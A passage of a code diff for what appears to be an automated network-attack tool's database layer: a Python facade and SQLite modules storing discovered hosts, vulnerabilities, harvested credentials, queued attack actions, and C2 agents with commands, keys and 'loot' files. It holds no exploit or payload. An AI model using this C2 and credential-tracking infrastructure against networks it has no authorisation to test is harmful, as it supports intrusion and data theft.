return self._base.execute(sql, params, many)
def executemany(self, sql: str, seq_of_params: Iterable[Iterable[Any]]) -> int:
return self._base.executemany(sql, seq_of_params)
def query(self, sql: str, params: Iterable[Any] = ()) -> List[Dict[str, Any]]:
return self._base.query(sql, params)
def query_one(self, sql: str, params: Iterable[Any] = ()) -> Optional[Dict[str, Any]]:
return self._base.query_one(sql, params)
def invalidate_stats_cache(self):
return self._base.invalidate_stats_cache()
# =========================================================================
# SCHEMA INITIALIZATION
# =========================================================================
def ensure_schema(self) -> None:
"""Create all database tables if missing"""
logger.info("Ensuring database schema...")
# Each module creates its own tables
self._config.create_tables()
self._actions.create_tables()
self._hosts.create_tables()
self._services.create_tables()
self._queue.create_tables()
self._stats.create_tables()
self._vulnerabilities.create_tables()
self._software.create_tables()
self._credentials.create_tables()
self._scripts.create_tables()
self._backups.create_tables()
self._comments.create_tables()
self._agents.create_tables()
self._studio.create_tables()
self._webenum.create_tables()
# Initialize stats singleton
self._stats.ensure_stats_initialized()
logger.info("Database schema ready")
# =========================================================================
# METHOD DELEGATION - All existing methods forwarded automatically
# =========================================================================
# Config operations
def get_config(self) -> Dict[str, Any]:
return self._config.get_config()
def save_config(self, config: Dict[str, Any]) -> None:
return self._config.save_config(config)
# Host operations
def get_all_hosts(self) -> List[Dict[str, Any]]:
return self._hosts.get_all_hosts()
def update_host(self, mac_address: str, ips: Optional[str] = None,
hostnames: Optional[str] = None, alive: Optional[int] = None,
ports: Optional[str] = None, vendor: Optional[str] = None,
essid: Optional[str] = None):
return self._hosts.update_host(mac_address, ips, hostnames, alive, ports, vendor, essid)
def merge_ip_stub_into_real(self, ip: str, real_mac: str,
hostname: Optional[str] = None, essid_hint: Optional[str] = None):
return self._hosts.merge_ip_stub_into_real(ip, real_mac, hostname, essid_hint)
def update_hostname(self, mac_address: str, new_hostname: str):
return self._hosts.update_hostname(mac_address, new_hostname)
def get_current_hostname(self, mac_address: str) -> Optional[str]:
return self._hosts.get_current_hostname(mac_address)
def record_hostname_seen(self, mac_address: str, hostname: str):
return self._hosts.record_hostname_seen(mac_address, hostname)
def list_hostname_history(self, mac_address: str) -> List[Dict[str, Any]]:
return self._hosts.list_hostname_history(mac_address)
def update_ips_current(self, mac_address: str, current_ips: Iterable[str], cap_prev: int = 200):
return self._hosts.update_ips_current(mac_address, current_ips, cap_prev)
def update_ports_current(self, mac_address: str, current_ports: Iterable[int], cap_prev: int = 500):
return self._hosts.update_ports_current(mac_address, current_ports, cap_prev)
def update_essid_current(self, mac_address: str, new_essid: Optional[str], cap_prev: int = 50):
return self._hosts.update_essid_current(mac_address, new_essid, cap_prev)
# Action operations
def sync_actions(self, actions):
return self._actions.sync_actions(actions)
def list_actions(self):
return self._actions.list_actions()
def list_studio_actions(self):
return self._actions.list_studio_actions()
def get_action_by_class(self, b_class: str) -> dict | None:
return self._actions.get_action_by_class(b_class)
def delete_action(self, b_class: str) -> None:
return self._actions.delete_action(b_class)
def upsert_simple_action(self, *, b_class: str, b_module: str, **kw) -> None:
return self._actions.upsert_simple_action(b_class=b_class, b_module=b_module, **kw)
def list_action_cards(self) -> list[dict]:
return self._actions.list_action_cards()
def get_action_definition(self, b_class: str) -> Optional[Dict[str, Any]]:
return self._actions.get_action_definition(b_class)
# Queue operations
def get_next_queued_action(self) -> Optional[Dict[str, Any]]:
return self._queue.get_next_queued_action()
def update_queue_status(self, queue_id: int, status: str, error_msg: str = None, result: str = None):
return self._queue.update_queue_status(queue_id, status, error_msg, result)
def promote_due_scheduled_to_pending(self) -> int:
return self._queue.promote_due_scheduled_to_pending()
def ensure_scheduled_occurrence(self, action_name: str, next_run_at: str,
mac: Optional[str] = "", ip: Optional[str] = "", **kwargs) -> bool:
return self._queue.ensure_scheduled_occurrence(action_name, next_run_at, mac, ip, **kwargs)
def queue_action(self, action_name: str, mac: str, ip: str, port: int = None,
priority: int = 50, trigger: str = None, metadata: Dict = None) -> None:
return self._queue.queue_action(action_name, mac, ip, port, priority, trigger, metadata)
def queue_action_at(self, action_name: str, mac: Optional[str] = "", ip: Optional[str] = "", **kwargs) -> None:
return self._queue.queue_action_at(action_name, mac, ip, **kwargs)
def list_action_queue(self, statuses: Optional[Iterable[str]] = None) -> List[Dict[str, Any]]:
return self._queue.list_action_queue(statuses)
def get_upcoming_actions_summary(self) -> List[Dict[str, Any]]:
return self._queue.get_upcoming_actions_summary()
def supersede_old_attempts(self, action_name: str, mac_address: str,
port: Optional[int] = None, ref_ts: Optional[str] = None) -> int:
return self._queue.supersede_old_attempts(action_name, mac_address, port, ref_ts)
def list_attempt_history(self, action_name: str, mac_address: str,
port: Optional[int] = None, limit: int = 20) -> List[Dict[str, Any]]:
return self._queue.list_attempt_history(action_name, mac_address, port, limit)
def get_action_status_from_queue(self, action_name: str,
mac_address: Optional[str] = None) -> Optional[Dict[str, Any]]:
return self._queue.get_action_status_from_queue(action_name, mac_address)
def get_last_action_status_from_queue(self, mac_address: str, action_name: str) -> Optional[Dict[str, str]]:
return self._queue.get_last_action_status_from_queue(mac_address, action_name)
def get_last_action_statuses_for_mac(self, mac_address: str) -> Dict[str, Dict[str, str]]:
return self._queue.get_last_action_statuses_for_mac(mac_address)
# Vulnerability operations
def add_vulnerability(self, mac_address: str, vuln_id: str, ip: Optional[str] = None,
hostname: Optional[str] = None, port: Optional[int] = None):
return self._vulnerabilities.add_vulnerability(mac_address, vuln_id, ip, hostname, port)
def update_vulnerability_status(self, mac_address: str, current_vulns: List[str]):
return self._vulnerabilities.update_vulnerability_status(mac_address, current_vulns)
def update_vulnerability_status_by_port(self, mac_address: str, port: int, current_vulns: List[str]):
return self._vulnerabilities.update_vulnerability_status_by_port(mac_address, port, current_vulns)
def get_all_vulns(self) -> List[Dict[str, Any]]:
return self._vulnerabilities.get_all_vulns()
def save_vulnerabilities(self, mac: str, ip: str, findings: List[Dict]):
return self._vulnerabilities.save_vulnerabilities(mac, ip, findings)
def cleanup_vulnerability_duplicates(self):
return self._vulnerabilities.cleanup_vulnerability_duplicates()
def fix_vulnerability_history_nulls(self):
return self._vulnerabilities.fix_vulnerability_history_nulls()
def count_vulnerabilities_alive(self, distinct: bool = False, active_only: bool = True) -> int:
return self._vulnerabilities.count_vulnerabilities_alive(distinct, active_only)
def count_distinct_vulnerabilities(self, alive_only: bool = False) -> int:
return self._vulnerabilities.count_distinct_vulnerabilities(alive_only)
def get_vulnerabilities_for_alive_hosts(self) -> List[str]:
return self._vulnerabilities.get_vulnerabilities_for_alive_hosts()
def list_vulnerability_history(self, cve_id: str | None = None,
mac: str | None = None, limit: int = 500) -> list[dict]:
return self._vulnerabilities.list_vulnerability_history(cve_id, mac, limit)
# CVE metadata
def get_cve_meta(self, cve_id: str) -> Optional[Dict[str, Any]]:
return self._vulnerabilities.get_cve_meta(cve_id)
def upsert_cve_meta(self, meta: Dict[str, Any]) -> None:
return self._vulnerabilities.upsert_cve_meta(meta)
def get_cve_meta_bulk(self, cve_ids: List[str]) -> Dict[str, Dict[str, Any]]:
return self._vulnerabilities.get_cve_meta_bulk(cve_ids)
# Software operations
def add_detected_software(self, mac_address: str, cpe: str, ip: Optional[str] = None,
hostname: Optional[str] = None, port: Optional[int] = None) -> None:
return self._software.add_detected_software(mac_address, cpe, ip, hostname, port)
def update_detected_software_status(self, mac_address: str, current_cpes: List[str]) -> None:
return self._software.update_detected_software_status(mac_address, current_cpes)
def migrate_cpe_from_vulnerabilities(self) -> int:
return self._software.migrate_cpe_from_vulnerabilities()
# Credential operations
def insert_cred(self, service: str, mac: Optional[str] = None, ip: Optional[str] = None,
hostname: Optional[str] = None, user: Optional[str] = None,
password: Optional[str] = None, port: Optional[int] = None,
database: Optional[str] = None, extra: Optional[Dict[str, Any]] = None):
return self._credentials.insert_cred(service, mac, ip, hostname, user, password, port, database, extra)
def list_creds_grouped(self) -> List[Dict[str, Any]]:
return self._credentials.list_creds_grouped()
# Service operations
def upsert_port_service(self, mac_address: str, ip: Optional[str], port: int, **kwargs):
return self._services.upsert_port_service(mac_address, ip, port, **kwargs)
def get_services_for_host(self, mac_address: str) -> List[Dict]:
return self._services.get_services_for_host(mac_address)
def find_hosts_by_service(self, service: str) -> List[Dict]:
return self._services.find_hosts_by_service(service)
def get_service_for_host_port(self, mac_address: str, port: int, protocol: str = "tcp") -> Optional[Dict]:
return self._services.get_service_for_host_port(mac_address, port, protocol)
def _rebuild_host_ports(self, mac_address: str):
return self._services._rebuild_host_ports(mac_address)
# Script operations
def add_script(self, name: str, type_: str, path: str, main_file: Optional[str] = None,
category: Optional[str] = None, description: Optional[str] = None):
return self._scripts.add_script(name, type_, path, main_file, category, description)
def list_scripts(self) -> List[Dict[str, Any]]:
return self._scripts.list_scripts()
def delete_script(self, name: str) -> None:
return self._scripts.delete_script(name)
# Stats operations
def get_livestats(self) -> Dict[str, int]:
return self._stats.get_livestats()
def update_livestats(self, total_open_ports: int, alive_hosts_count: int,
all_known_hosts_count: int, vulnerabilities_count: int):
return self._stats.update_livestats(total_open_ports, alive_hosts_count,
all_known_hosts_count, vulnerabilities_count)
def get_stats(self) -> Dict[str, int]:
return self._stats.get_stats()
def set_stats(self, total_open_ports: int, alive_hosts_count: int,
all_known_hosts_count: int, vulnerabilities_count: int):
return self._stats.set_stats(total_open_ports, alive_hosts_count,
all_known_hosts_count, vulnerabilities_count)
def get_display_stats(self) -> Dict[str, int]:
return self._stats.get_display_stats()
def ensure_stats_initialized(self):
return self._stats.ensure_stats_initialized()
# Backup operations
def add_backup(self, filename: str, description: str, date: str, type_: str = "User Backup",
is_default: bool = False, is_restore: bool = False, is_github: bool = False):
return self._backups.add_backup(filename, description, date, type_, is_default, is_restore, is_github)
def list_backups(self) -> List[Dict[str, Any]]:
return self._backups.list_backups()
def delete_backup(self, filename: str) -> None:
return self._backups.delete_backup(filename)
def clear_default_backup(self) -> None:
return self._backups.clear_default_backup()
def set_default_backup(self, filename: str) -> None:
return self._backups.set_default_backup(filename)
# Comment operations
def count_comments(self) -> int:
return self._comments.count_comments()
def insert_comments(self, comments: List[Tuple[str, str, str, str, int]]):
return self._comments.insert_comments(comments)
def import_comments_from_json(self, json_path: str, lang: Optional[str] = None,
default_theme: str = "general", default_weight: int = 1,
clear_existing: bool = False) -> int:
return self._comments.import_comments_from_json(json_path, lang, default_theme,
default_weight, clear_existing)
def random_comment_for(self, status: str, lang: str = "en") -> Optional[Dict[str, Any]]:
return self._comments.random_comment_for(status, lang)
# Agent operations (C2)
def save_agent(self, agent_data: dict) -> None:
return self._agents.save_agent(agent_data)
def save_command(self, agent_id: str, command: str, response: str | None = None, success: bool = False) -> None:
return self._agents.save_command(agent_id, command, response, success)
def save_telemetry(self, agent_id: str, telemetry: dict) -> None:
return self._agents.save_telemetry(agent_id, telemetry)
def save_loot(self, loot: dict) -> None:
return self._agents.save_loot(loot)
def get_agent_history(self, agent_id: str) -> List[dict]:
return self._agents.get_agent_history(agent_id)
def purge_stale_agents(self, threshold_seconds: int) -> int:
return self._agents.purge_stale_agents(threshold_seconds)
def get_stale_agents(self, threshold_seconds: int) -> list[dict]:
return self._agents.get_stale_agents(threshold_seconds)
# Agent key management
def get_active_key(self, agent_id: str) -> str | None:
return self._agents.get_active_key(agent_id)
def list_keys(self, agent_id: str) -> list[dict]:
return self._agents.list_keys(agent_id)
def save_new_key(self, agent_id: str, key_b64: str) -> int:
return self._agents.save_new_key(agent_id, key_b64)
def rotate_key(self, agent_id: str, new_key_b64: str) -> int:
return self._agents.rotate_key(agent_id, new_key_b64)
def revoke_keys(self, agent_id: str) -> int:
return self._agents.revoke_keys(agent_id)
def verify_client_key(self, agent_id: str, key_b64: str) -> bool:
return self._agents.verify_client_key(agent_id, key_b64)
def migrate_keys_from_file(self, json_path: str) -> int:
return self._agents.migrate_keys_from_file(json_path)
# Studio operations
def get_studio_actions(self):
return self._studio.get_studio_actions()
def get_db_actions(self):
return self._studio.get_db_actions()
def update_studio_action(self, b_class: str, updates: dict):
return self._studio.update_studio_action(b_class, updates)
def get_studio_edges(self):
return self._studio.get_studio_edges()
def upsert_studio_edge(self, from_action: str, to_action: str, edge_type: str, metadata: dict = None):
return self._studio.upsert_studio_edge(from_action, to_action, edge_type, metadata)
def delete_studio_edge(self, edge_id: int):
return self._studio.delete_studio_edge(edge_id)
def get_studio_hosts(self, include_real: bool = True):
return self._studio.get_studio_hosts(include_real)
def upsert_studio_host(self, mac_address: str, data: dict):
return self._studio.upsert_studio_host(mac_address, data)
def delete_studio_host(self, mac: str):
return self._studio.delete_studio_host(mac)
def save_studio_layout(self, name: str, layout_data: dict, description: str = None):
return self._studio.save_studio_layout(name, layout_data, description)
def load_studio_layout(self, name: str):
return self._studio.load_studio_layout(name)
def apply_studio_to_runtime(self):
return self._studio.apply_studio_to_runtime()
def _replace_actions_studio_with_actions(self, vacuum: bool = False):
return self._studio._replace_actions_studio_with_actions(vacuum)
def _sync_actions_studio_schema_and_rows(self):
return self._studio._sync_actions_studio_schema_and_rows()
# WebEnum operations
# Add webenum methods if you have any...
# =========================================================================
# UTILITY OPERATIONS
# =========================================================================
def checkpoint(self, mode: str = "TRUNCATE") -> Tuple[int, int, int]:
"""Force a WAL checkpoint"""
return self._base.checkpoint(mode)
def wal_checkpoint(self, mode: str = "TRUNCATE") -> Tuple[int, int, int]:
"""Alias for checkpoint"""
return self.checkpoint(mode)
def optimize(self) -> None:
"""Run PRAGMA optimize"""
return self._base.optimize()
def vacuum(self) -> None:
"""Vacuum the database"""
return self._base.vacuum()
# Internal helper methods used by modules
def _table_exists(self, name: str) -> bool:
return self._base._table_exists(name)
def _column_names(self, table: str) -> List[str]:
return self._base._column_names(table)
def _ensure_column(self, table: str, column: str, ddl: str) -> None:
return self._base._ensure_column(table, column, ddl)
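The facade above only exposes delegation; its constructor is not part of this hunk. A minimal usage sketch, assuming a `BjornDatabase(db_path)` constructor, an illustrative action name, and a numeric `id` key on queue rows (all assumptions, not confirmed by this diff):

```python
# Hedged sketch: constructor signature, action name and the queue row's "id" key are assumptions.
from database import BjornDatabase

db = BjornDatabase("/home/bjorn/Bjorn/data/bjorn.db")   # illustrative path
db.ensure_schema()                                       # each ops module creates its own tables

# Scheduler side: enqueue work for a newly discovered host
db.queue_action("NmapVulnScanner", mac="aa:bb:cc:dd:ee:ff", ip="192.168.1.50",
                port=80, priority=20, trigger="on_new_host")

# Orchestrator side: consume the queue and record the outcome
item = db.get_next_queued_action()
if item:
    db.update_queue_status(item["id"], "success", result="3 findings")
```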

38
db_utils/__init__.py Normal file
View File

@@ -0,0 +1,38 @@
# db_utils/__init__.py
# Database utilities package
from .base import DatabaseBase
from .config import ConfigOps
from .hosts import HostOps
from .actions import ActionOps
from .queue import QueueOps
from .vulnerabilities import VulnerabilityOps
from .software import SoftwareOps
from .credentials import CredentialOps
from .services import ServiceOps
from .scripts import ScriptOps
from .stats import StatsOps
from .backups import BackupOps
from .comments import CommentOps
from .agents import AgentOps
from .studio import StudioOps
from .webenum import WebEnumOps
__all__ = [
'DatabaseBase',
'ConfigOps',
'HostOps',
'ActionOps',
'QueueOps',
'VulnerabilityOps',
'SoftwareOps',
'CredentialOps',
'ServiceOps',
'ScriptOps',
'StatsOps',
'BackupOps',
'CommentOps',
'AgentOps',
'StudioOps',
'WebEnumOps',
]
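The `__init__.py` only re-exports the ops classes; how the facade composes them is not shown in this hunk. A sketch of the intended wiring, inferred from the delegation code above (the constructor body itself is an assumption):

```python
# Sketch only: attribute names match the facade's delegation code, the wiring is assumed.
from db_utils import DatabaseBase, ConfigOps, HostOps, ActionOps

class ExampleFacade:
    def __init__(self, db_path: str):
        self._base = DatabaseBase(db_path)    # single SQLite connection + lock
        self._config = ConfigOps(self._base)  # every ops module shares that base
        self._hosts = HostOps(self._base)
        self._actions = ActionOps(self._base)
```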

293
db_utils/actions.py Normal file
View File

@@ -0,0 +1,293 @@
# db_utils/actions.py
# Action definition and management operations
import json
import sqlite3
from functools import lru_cache
from typing import Any, Dict, List, Optional
import logging
from logger import Logger
logger = Logger(name="db_utils.actions", level=logging.DEBUG)
class ActionOps:
"""Action definition and configuration operations"""
def __init__(self, base):
self.base = base
def create_tables(self):
"""Create actions table"""
self.base.execute("""
CREATE TABLE IF NOT EXISTS actions (
b_class TEXT PRIMARY KEY,
b_module TEXT NOT NULL,
b_port INTEGER,
b_status TEXT,
b_parent TEXT,
b_args TEXT,
b_description TEXT,
b_name TEXT,
b_author TEXT,
b_version TEXT,
b_icon TEXT,
b_docs_url TEXT,
b_examples TEXT,
b_action TEXT DEFAULT 'normal',
b_service TEXT,
b_trigger TEXT,
b_requires TEXT,
b_priority INTEGER DEFAULT 50,
b_tags TEXT,
b_timeout INTEGER DEFAULT 300,
b_max_retries INTEGER DEFAULT 3,
b_cooldown INTEGER DEFAULT 0,
b_rate_limit TEXT,
b_stealth_level INTEGER DEFAULT 5,
b_risk_level TEXT DEFAULT 'medium',
b_enabled INTEGER DEFAULT 1
);
""")
logger.debug("Actions table created/verified")
# =========================================================================
# ACTION CRUD OPERATIONS
# =========================================================================
def sync_actions(self, actions):
"""Sync action definitions to database"""
if not actions:
return
def _as_int(x, default=None):
if x is None:
return default
if isinstance(x, (list, tuple)):
x = x[0] if x else default
try:
return int(x)
except Exception:
return default
def _as_str(x, default=None):
if x is None:
return default
if isinstance(x, (list, tuple, set, dict)):
try:
return json.dumps(list(x) if not isinstance(x, dict) else x, ensure_ascii=False)
except Exception:
return default
return str(x)
def _as_json(x):
if x is None:
return None
if isinstance(x, str):
xs = x.strip()
if (xs.startswith("{") and xs.endswith("}")) or (xs.startswith("[") and xs.endswith("]")):
return xs
return json.dumps(x, ensure_ascii=False)
try:
return json.dumps(x, ensure_ascii=False)
except Exception:
return None
with self.base.transaction():
for a in actions:
# Normalize fields
b_service = a.get("b_service")
if isinstance(b_service, (list, tuple, set, dict)):
b_service = json.dumps(list(b_service) if not isinstance(b_service, dict) else b_service, ensure_ascii=False)
b_tags = a.get("b_tags")
if isinstance(b_tags, (list, tuple, set, dict)):
b_tags = json.dumps(list(b_tags) if not isinstance(b_tags, dict) else b_tags, ensure_ascii=False)
b_trigger = a.get("b_trigger")
if isinstance(b_trigger, (list, tuple, set, dict)):
b_trigger = json.dumps(b_trigger, ensure_ascii=False)
b_requires = a.get("b_requires")
if isinstance(b_requires, (list, tuple, set, dict)):
b_requires = json.dumps(b_requires, ensure_ascii=False)
b_args_json = _as_json(a.get("b_args"))
# Enriched metadata
b_name = _as_str(a.get("b_name"))
b_description = _as_str(a.get("b_description"))
b_author = _as_str(a.get("b_author"))
b_version = _as_str(a.get("b_version"))
b_icon = _as_str(a.get("b_icon"))
b_docs_url = _as_str(a.get("b_docs_url"))
b_examples = _as_json(a.get("b_examples"))
# Typed fields
b_port = _as_int(a.get("b_port"))
b_priority = _as_int(a.get("b_priority"), 50)
b_timeout = _as_int(a.get("b_timeout"), 300)
b_max_retries = _as_int(a.get("b_max_retries"), 3)
b_cooldown = _as_int(a.get("b_cooldown"), 0)
b_stealth_level = _as_int(a.get("b_stealth_level"), 5)
b_enabled = _as_int(a.get("b_enabled"), 1)
b_rate_limit = _as_str(a.get("b_rate_limit"))
b_risk_level = _as_str(a.get("b_risk_level"), "medium")
self.base.execute("""
INSERT INTO actions (
b_class,b_module,b_port,b_status,b_parent,
b_action,b_service,b_trigger,b_requires,b_priority,
b_tags,b_timeout,b_max_retries,b_cooldown,b_rate_limit,
b_stealth_level,b_risk_level,b_enabled,
b_args,
b_name, b_description, b_author, b_version, b_icon, b_docs_url, b_examples
) VALUES (?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,
?,?,?,?,?,?,?)
ON CONFLICT(b_class) DO UPDATE SET
b_module = excluded.b_module,
b_port = COALESCE(excluded.b_port, actions.b_port),
b_status = COALESCE(excluded.b_status, actions.b_status),
b_parent = COALESCE(excluded.b_parent, actions.b_parent),
b_action = COALESCE(excluded.b_action, actions.b_action),
b_service = COALESCE(excluded.b_service, actions.b_service),
b_trigger = COALESCE(excluded.b_trigger, actions.b_trigger),
b_requires = COALESCE(excluded.b_requires, actions.b_requires),
b_priority = COALESCE(excluded.b_priority, actions.b_priority),
b_tags = COALESCE(excluded.b_tags, actions.b_tags),
b_timeout = COALESCE(excluded.b_timeout, actions.b_timeout),
b_max_retries = COALESCE(excluded.b_max_retries, actions.b_max_retries),
b_cooldown = COALESCE(excluded.b_cooldown, actions.b_cooldown),
b_rate_limit = COALESCE(excluded.b_rate_limit, actions.b_rate_limit),
b_stealth_level = COALESCE(excluded.b_stealth_level, actions.b_stealth_level),
b_risk_level = COALESCE(excluded.b_risk_level, actions.b_risk_level),
b_enabled = COALESCE(excluded.b_enabled, actions.b_enabled),
b_args = COALESCE(excluded.b_args, actions.b_args),
b_name = COALESCE(excluded.b_name, actions.b_name),
b_description = COALESCE(excluded.b_description, actions.b_description),
b_author = COALESCE(excluded.b_author, actions.b_author),
b_version = COALESCE(excluded.b_version, actions.b_version),
b_icon = COALESCE(excluded.b_icon, actions.b_icon),
b_docs_url = COALESCE(excluded.b_docs_url, actions.b_docs_url),
b_examples = COALESCE(excluded.b_examples, actions.b_examples)
""", (
a.get("b_class"),
a.get("b_module"),
b_port,
a.get("b_status"),
a.get("b_parent"),
a.get("b_action", "normal"),
b_service,
b_trigger,
b_requires,
b_priority,
b_tags,
b_timeout,
b_max_retries,
b_cooldown,
b_rate_limit,
b_stealth_level,
b_risk_level,
b_enabled,
b_args_json,
b_name,
b_description,
b_author,
b_version,
b_icon,
b_docs_url,
b_examples
))
# Update action counter in stats
action_count_row = self.base.query_one("SELECT COUNT(*) as cnt FROM actions WHERE b_enabled = 1")
if action_count_row:
try:
self.base.execute("""
UPDATE stats
SET actions_count = ?
WHERE id = 1
""", (action_count_row['cnt'],))
except sqlite3.OperationalError:
# Column doesn't exist yet, add it
self.base.execute("ALTER TABLE stats ADD COLUMN actions_count INTEGER DEFAULT 0")
self.base.execute("""
UPDATE stats
SET actions_count = ?
WHERE id = 1
""", (action_count_row['cnt'],))
logger.info(f"Synchronized {len(actions)} actions")
def list_actions(self):
"""List all action definitions ordered by class name"""
return self.base.query("SELECT * FROM actions ORDER BY b_class;")
def list_studio_actions(self):
"""List all studio action definitions"""
return self.base.query("SELECT * FROM actions_studio ORDER BY b_class;")
def get_action_by_class(self, b_class: str) -> dict | None:
"""Get action by class name"""
rows = self.base.query("SELECT * FROM actions WHERE b_class=? LIMIT 1;", (b_class,))
return rows[0] if rows else None
def delete_action(self, b_class: str) -> None:
"""Delete action by class name"""
self.base.execute("DELETE FROM actions WHERE b_class=?;", (b_class,))
def upsert_simple_action(self, *, b_class: str, b_module: str, **kw) -> None:
"""Minimal upsert of an action by reusing sync_actions"""
rec = {"b_class": b_class, "b_module": b_module}
rec.update(kw)
self.sync_actions([rec])
def list_action_cards(self) -> list[dict]:
"""Lightweight descriptor of actions for card-based UIs"""
rows = self.base.query("""
SELECT b_class, COALESCE(b_enabled, 0) AS b_enabled
FROM actions
ORDER BY b_class;
""")
out = []
for r in rows:
cls = r["b_class"]
enabled = int(r["b_enabled"]) # 0 reste 0
out.append({
"name": cls,
"image": f"/actions/actions_icons/{cls}.png",
"enabled": enabled,
})
return out
# def list_action_cards(self) -> list[dict]:
# """Lightweight descriptor of actions for card-based UIs"""
# rows = self.base.query("""
# SELECT b_class, b_enabled
# FROM actions
# ORDER BY b_class;
# """)
# out = []
# for r in rows:
# cls = r["b_class"]
# out.append({
# "name": cls,
# "image": f"/actions/actions_icons/{cls}.png",
# "enabled": int(r.get("b_enabled", 1) or 1),
# })
# return out
@lru_cache(maxsize=32)
def get_action_definition(self, b_class: str) -> Optional[Dict[str, Any]]:
"""Cached lookup of an action definition by class name"""
row = self.base.query("SELECT * FROM actions WHERE b_class=? LIMIT 1;", (b_class,))
if not row:
return None
r = row[0]
if r.get("b_args"):
try:
r["b_args"] = json.loads(r["b_args"])
except Exception:
pass
return r
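For reference, a hedged sketch of the record shape `sync_actions()` consumes: only the `b_*` key names come from the table definition above, the values are invented, and it assumes the full schema (including `stats`) was already created via the facade's `ensure_schema()`.

```python
# Illustrative action record; omitted keys keep their previous values thanks to the
# COALESCE-based upsert above. `db` is assumed to be the BjornDatabase facade.
action = {
    "b_class": "FTPBruteforce",              # made-up action name
    "b_module": "actions.ftp_bruteforce",
    "b_port": 21,
    "b_service": ["ftp"],                    # lists/dicts are JSON-encoded before storage
    "b_trigger": {"on_open_port": 21},
    "b_priority": 30,
    "b_risk_level": "high",
    "b_enabled": 1,
}
db.sync_actions([action])
print(db.list_action_cards())  # e.g. [{'name': 'FTPBruteforce', 'image': '/actions/actions_icons/FTPBruteforce.png', 'enabled': 1}]
```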

369
db_utils/agents.py Normal file
View File

@@ -0,0 +1,369 @@
# db_utils/agents.py
# C2 (Command & Control) agent management operations
import json
import os
import sqlite3
from typing import List, Optional
import logging
from logger import Logger
logger = Logger(name="db_utils.agents", level=logging.DEBUG)
class AgentOps:
"""C2 agent tracking and command history operations"""
def __init__(self, base):
self.base = base
def create_tables(self):
"""Create C2 agent tables"""
# Agents table
self.base.execute("""
CREATE TABLE IF NOT EXISTS agents (
id TEXT PRIMARY KEY,
hostname TEXT,
platform TEXT,
os_version TEXT,
architecture TEXT,
ip_address TEXT,
first_seen TIMESTAMP,
last_seen TIMESTAMP,
status TEXT,
notes TEXT
);
""")
# Indexes for performance
self.base.execute("CREATE INDEX IF NOT EXISTS idx_agents_last_seen ON agents(last_seen);")
self.base.execute("CREATE INDEX IF NOT EXISTS idx_agents_status ON agents(status);")
# Commands table
self.base.execute("""
CREATE TABLE IF NOT EXISTS commands (
id INTEGER PRIMARY KEY AUTOINCREMENT,
agent_id TEXT,
command TEXT,
timestamp TIMESTAMP,
response TEXT,
success BOOLEAN,
FOREIGN KEY (agent_id) REFERENCES agents (id)
);
""")
# Agent keys (versioned for rotation)
self.base.execute("""
CREATE TABLE IF NOT EXISTS agent_keys (
id INTEGER PRIMARY KEY AUTOINCREMENT,
agent_id TEXT NOT NULL,
key_b64 TEXT NOT NULL,
version INTEGER NOT NULL,
created_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP,
rotated_at TIMESTAMP,
revoked_at TIMESTAMP,
active INTEGER DEFAULT 1,
UNIQUE(agent_id, version)
);
""")
self.base.execute("CREATE INDEX IF NOT EXISTS idx_agent_keys_active ON agent_keys(agent_id, active);")
# Loot table
self.base.execute("""
CREATE TABLE IF NOT EXISTS loot (
id INTEGER PRIMARY KEY AUTOINCREMENT,
agent_id TEXT,
filename TEXT,
filepath TEXT,
size INTEGER,
timestamp TIMESTAMP,
hash TEXT,
FOREIGN KEY (agent_id) REFERENCES agents (id)
);
""")
# Telemetry table
self.base.execute("""
CREATE TABLE IF NOT EXISTS telemetry (
id INTEGER PRIMARY KEY AUTOINCREMENT,
agent_id TEXT,
cpu_percent REAL,
mem_percent REAL,
disk_percent REAL,
uptime INTEGER,
timestamp TIMESTAMP,
FOREIGN KEY (agent_id) REFERENCES agents (id)
);
""")
logger.debug("C2 agent tables created/verified")
# =========================================================================
# AGENT OPERATIONS
# =========================================================================
def save_agent(self, agent_data: dict) -> None:
"""
Upsert an agent preserving first_seen and updating last_seen.
The status field is expected as a string (e.g. 'online'/'offline').
"""
agent_id = agent_data.get('id')
hostname = agent_data.get('hostname')
platform_ = agent_data.get('platform')
os_version = agent_data.get('os_version')
arch = agent_data.get('architecture')
ip_address = agent_data.get('ip_address')
status = agent_data.get('status') or 'offline'
notes = agent_data.get('notes')
if not agent_id:
raise ValueError("save_agent: 'id' is required in agent_data")
# Upsert that preserves first_seen and updates last_seen to NOW
self.base.execute("""
INSERT INTO agents (id, hostname, platform, os_version, architecture, ip_address,
first_seen, last_seen, status, notes)
VALUES (?, ?, ?, ?, ?, ?, CURRENT_TIMESTAMP, CURRENT_TIMESTAMP, ?, ?)
ON CONFLICT(id) DO UPDATE SET
hostname = COALESCE(excluded.hostname, agents.hostname),
platform = COALESCE(excluded.platform, agents.platform),
os_version = COALESCE(excluded.os_version, agents.os_version),
architecture = COALESCE(excluded.architecture, agents.architecture),
ip_address = COALESCE(excluded.ip_address, agents.ip_address),
first_seen = COALESCE(agents.first_seen, excluded.first_seen, CURRENT_TIMESTAMP),
last_seen = CURRENT_TIMESTAMP,
status = COALESCE(excluded.status, agents.status),
notes = COALESCE(excluded.notes, agents.notes)
""", (agent_id, hostname, platform_, os_version, arch, ip_address, status, notes))
# Optionally refresh zombie counter
try:
self._refresh_zombie_counter()
except Exception:
pass
def save_command(self, agent_id: str, command: str,
response: str | None = None, success: bool = False) -> None:
"""Record a command history entry"""
if not agent_id or not command:
raise ValueError("save_command: 'agent_id' and 'command' are required")
self.base.execute("""
INSERT INTO commands (agent_id, command, timestamp, response, success)
VALUES (?, ?, CURRENT_TIMESTAMP, ?, ?)
""", (agent_id, command, response, 1 if success else 0))
def save_telemetry(self, agent_id: str, telemetry: dict) -> None:
"""Record a telemetry snapshot for an agent"""
if not agent_id:
raise ValueError("save_telemetry: 'agent_id' is required")
self.base.execute("""
INSERT INTO telemetry (agent_id, cpu_percent, mem_percent, disk_percent, uptime, timestamp)
VALUES (?, ?, ?, ?, ?, CURRENT_TIMESTAMP)
""", (
agent_id,
telemetry.get('cpu_percent'),
telemetry.get('mem_percent'),
telemetry.get('disk_percent'),
telemetry.get('uptime')
))
def save_loot(self, loot: dict) -> None:
"""
Record a retrieved file (loot).
Expected: {'agent_id', 'filename', 'filepath', 'size', 'hash'}
Timestamp is added database-side.
"""
if not loot or not loot.get('agent_id') or not loot.get('filename'):
raise ValueError("save_loot: 'agent_id' and 'filename' are required")
self.base.execute("""
INSERT INTO loot (agent_id, filename, filepath, size, timestamp, hash)
